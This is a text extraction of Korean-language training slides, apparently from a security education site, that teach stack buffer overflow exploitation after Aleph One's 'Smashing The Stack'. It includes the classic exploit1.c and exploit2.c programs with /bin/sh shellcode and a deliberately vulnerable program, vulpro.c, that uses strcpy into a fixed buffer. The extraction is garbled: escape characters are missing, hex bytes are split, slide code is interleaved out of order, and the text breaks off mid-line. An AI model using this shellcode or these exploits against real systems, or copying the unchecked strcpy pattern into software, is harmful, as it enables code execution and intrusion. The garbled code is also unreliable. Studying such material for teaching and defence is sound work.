Smashing The Stack For Fun And Profit Aleph
- Slides: 43
참고 자료 “Smashing The Stack For Fun And Profit”, Aleph One, Phrack 49 -14 http: //www. phrack. com “How to write Buffer Overflows”, mudge, Security. Focus “Advanced buffer overflow exploit”, Taeho Oh, Security. Focus “Buffer overflow exploit in the alpha linux”, Taeho Oh, Security. Focus http: //www. securityfocus. com “Writing buffer overflow exploits – a tutorial for beginners”, Mixter, Security. Focus http: //members. tripod. com/mixtersecurity/papers. html “buffer overwrites” http: //www. rootshell. com/documentation. html “w 00 on Heap Overflows” http: //www. tlsecurity. net/Textware/Bo. F_Do. S_+/heap-overflows. txt “Stack. Guard Compiler” http: //www. cse. ogi. edu/DISC/projects/immunix/Stack. Guard/ ` http: //www. kisec. com 3
1. 버퍼 오버플로우 Buffer Overflow ? C/C++ 컴파일러가 배열의 경계검사(Boundary Check)를 하지않아 선언된 크기보다 더 큰 데이터를 기록함으로써 발생되는 현상 운영체제가 스택이나 힙 영역에 임의의 데이터 기록 및 실행을 허용 함으로써 발생되는 현상 Lower Memory Address Local variables (buffer area) Stack Frame Pointer Overflow Return Address Arguments Execution Stack Frame Activation Record ` http: //www. kisec. com 4
1. 1 버퍼 오버플로우의 종류 Stack-Based Buffer Overflow 스택 영역에 할당된 버퍼에 크기를 초과하 는 데이터(실행 가능한 코드)를 기록하고 저장된 복귀 주소를 변경함으로써 임의의 코드를 실행 “Smashing The Stack For Fun And Profit”, Aleph One, Phrack 49 -14 Lower Memory Address Program Header Table TEXT Area 영역 TEXT Area Initialized DATA Area Heap-Based Buffer Overflow 힙 영역에 할당된 버퍼의 크기를 초과하는 데이터를 기록하거나 저장된 데이터 및 함 수의 주소를 변경함으로써 임의의 코드를 실행 DATA 영역 Uninitialized DATA Area HEAP Heap Area 영역 STACK Area 영역 “w 00 on Heap Overflows”, w 00 High Memory Address ` http: //www. kisec. com 5
2. 1 버퍼 오버플로우 공격의 원리 (1) exploit 1. c char shellcode[] = "xebx 1 fx 5 ex 89x 76x 08x 31xc 0x 88x 46x 07x 89x 46x 0 cxb 0x 0 b" "x 89xf 3x 8 dx 4 ex 08x 8 dx 56x 0 cxcdx 80x 31xdbx 89xd 8x 40xcd" "x 80xe 8xdcxffxff/bin/sh"; char large_string[128]; void main() { char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer, large_string); } ` http: //www. kisec. com 9
2. 1 버퍼 오버플로우 공격의 원리 (2) buffer (=0 xbfffffxx) int i long *long_ptr large_string 0 xbfffffxx. . . 0 xbfffffxx 80 bytes ` http: //www. kisec. com 32 bytes SFP Return Address Parameters 46 bytes 96 bytes strcpy() xebx 1 fx 5 ex 89 x 76x 08x 31xc 0 x 88x 46x 07x 89 x 46x 0 cxb 0x 0 b x 89xf 3x 8 dx 4 e x 08x 8 dx 56x 0 c xcdx 80x 31xdb. . . 0 xbfffffxx 10
2. 2 버퍼 오버플로우 공격의 이해 (1) vulpro. c buffer #include <stdio. h> void function(char *str) { char buffer[256]; printf(“Addr of buffer: %pn”, buffer); strcpy(buffer, str); printf(“Hello, %s!n”, buffer); } int main(int argc, char *argv[]) { function(argv[1]); printf(“Terminated normally. n”); } # gcc vulpro. c –o vulpro #. /vulpro bof Addr of buffer: 0 xbfffffxx Hello, bof! Terminated normally. # ` http: //www. kisec. com 256 bytes xebx 1 fx 5 ex 89 x 76x 08x 31xc 0 x 88x 46x 07x 89 x 46x 0 cxb 0x 0 b x 89xf 3x 8 dx 4 e x 08x 8 dx 56x 0 c xcdx 80x 31xdb x 89xd 8x 40xcd x 80xe 8xdcxff/bin/sh SFP Return Address Addr of argv[1] 11
2. 2 버퍼 오버플로우 공격의 이해 (2) exploit 2. c #include <stdlib. h> #define DEFAULT_OFFSET #define DEFAULT_BUFFER_SIZE 512 if (!(buff = malloc(bsize))) { printf("Can't allocate memory. n"); exit(0); } 0 char shellcode[] = “xebx 1 fx 5 ex 89x 76x 08x 31xc 0” “x 88x 46x 07x 89x 46x 0 cxb 0x 0 b” “x 89xf 3x 8 dx 4 ex 08x 8 dx 56x 0 c” “xcdx 80x 31xdbx 89xd 8x 40xcd” “x 80xe 8xdcxffxff/bin/sh”; addr = get_sp() - offset; printf("Using address: 0 x%xn", addr); ptr = buff; addr_ptr = (long *) ptr; for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr; unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } ptr += 4; for (i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i]; void main(int argc, char *argv[]) { char *buff, *ptr; long *addr_ptr, addr; int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE; int i; buff[bsize - 1] = '